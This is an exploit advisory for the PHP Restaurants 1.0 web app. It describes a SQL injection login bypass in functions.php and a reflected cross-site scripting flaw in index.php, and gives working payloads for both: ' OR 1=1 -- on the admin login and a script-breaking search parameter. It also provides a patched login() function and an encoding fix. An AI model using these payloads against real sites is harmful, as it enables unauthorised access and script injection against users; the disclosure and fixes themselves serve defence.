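# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
#
# ---------------------------------------------------------------------------
# 1) SQL injection / authentication bypass in functions.php (login())
# ---------------------------------------------------------------------------
#
# The vulnerable lines as shipped in functions.php:
#
#   $email = $_POST['email'];
#   $pw = $_POST['password'];
#   $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'";
#   $result = $conn->query($sql);
#
# Neither the `email` nor the `password` POST parameter is validated or bound as a
# query parameter: `email` is concatenated straight into the SQL string, so a quote
# in it terminates the literal and the rest of the WHERE clause can be rewritten.
# (`password` is passed through md5() first, so it is the `email` field that carries
# the injection.)
#
# Patched login() below: the e-mail is bound through a mysqli prepared statement
# (the original uses $conn->query()/num_rows/fetch_assoc(), i.e. mysqli), the
# password hash is compared in PHP with hash_equals(), and each redirect is
# followed by exit so the caller stops executing. Redirect targets and the
# `uid` cookie are unchanged so the rest of the application keeps working.

function login(){
    global $conn;

    // Missing POST fields become empty strings instead of raising an
    // undefined-index notice; they still fail the lookup below.
    $email = $_POST['email'] ?? '';
    $pw = $_POST['password'] ?? '';

    // Bind the e-mail instead of interpolating it: quotes, "--" or "OR 1=1" in
    // the value can no longer change the shape of the query. The password is
    // deliberately left out of the WHERE clause and checked in PHP.
    $stmt = $conn->prepare("SELECT * FROM `users` WHERE `email` = ? LIMIT 1");
    if ($stmt === false) {
        // Treat a failed prepare like a bad login rather than leaking the DB error.
        header('location: login.php?m=Wrong Password');
        exit;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    // NOTE(review): get_result() requires mysqlnd; switch to bind_result() if the
    // deployment lacks it.
    $result = $stmt->get_result();
    $row = ($result !== false) ? $result->fetch_assoc() : null;
    $stmt->close();

    // The original compares against md5($pw), so the `password` column holds
    // unsalted MD5; that format is kept here so existing accounts still log in.
    // hash_equals() makes the comparison constant-time.
    // TODO(review): migrate to password_hash()/password_verify() with a rehash on login.
    if ($row !== null && hash_equals((string) $row['password'], md5($pw))) {
        // NOTE(review): the session is a plaintext user-id cookie that any client
        // can forge; this is left as-is because other pages read `uid`.
        setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
        header('location: index.php');
        exit; // the original fell through and kept rendering after the redirect
    }

    header('location: login.php?m=Wrong Password');
    exit;
}

# Login bypass at the admin page: /rest1/admin/login.php
#
#   email & password : ' OR 1=1 -- 
#
# The payload must END WITH A SPACE: MySQL only treats "--" as a comment when it is
# followed by whitespace, so without the trailing space the closing quote of the
# original query is not commented out and the query fails instead of bypassing.
#
# ---------------------------------------------------------------------------
# 2) Reflected cross-site scripting on the main page /index.php
# ---------------------------------------------------------------------------
#
# The `search` GET parameter is echoed, unescaped, into a JavaScript string
# inside a <script> block:

/*
    xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; ?>", true);
    xhttp.send();
    </script>
*/

# Because the reflection lands inside a <script> block, the payload has to close
# that block first and then supply its own markup, for example:
#
#   /index.php?search=</script><img onerror=alert(1) src=a>
#
# Fix: the value is a URL query component, so encode it for that context before
# echoing it, e.g. `echo '&search='.rawurlencode($_GET['search']);`. The encoded
# output contains no `<`, `"` or `'`, so it can neither close the <script> block
# nor break out of the JavaScript string literal.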